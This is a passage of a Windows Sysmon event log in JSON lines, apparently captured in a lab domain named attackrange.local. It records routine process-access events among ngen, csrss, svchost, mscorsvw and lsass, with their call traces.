06:01:09.590","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0525-5F25-0000-0010EDB61300}","TargetProcessId":"224","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:09.590\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0525-5F25-0000-0010EDB61300}\r\nTargetProcessId: 224\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:09.590","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0525-5F25-0000-0010EDB61300}","TargetProcessId":"224","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:09.606\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0525-5F25-0000-0010EDB61300}\r\nTargetProcessId: 224\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:09.606","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0525-5F25-0000-0010EDB61300}","TargetProcessId":"224","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:09.950\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0525-5F25-0000-00102EBC1300}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:09.950","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0525-5F25-0000-00102EBC1300}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:09.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0525-5F25-0000-00102EBC1300}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:09.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0525-5F25-0000-00102EBC1300}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:09.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0525-5F25-0000-00102EBC1300}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:09.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0525-5F25-0000-00102EBC1300}","TargetProcessId":"5068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.622\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.622","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.622\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.622","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.622\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 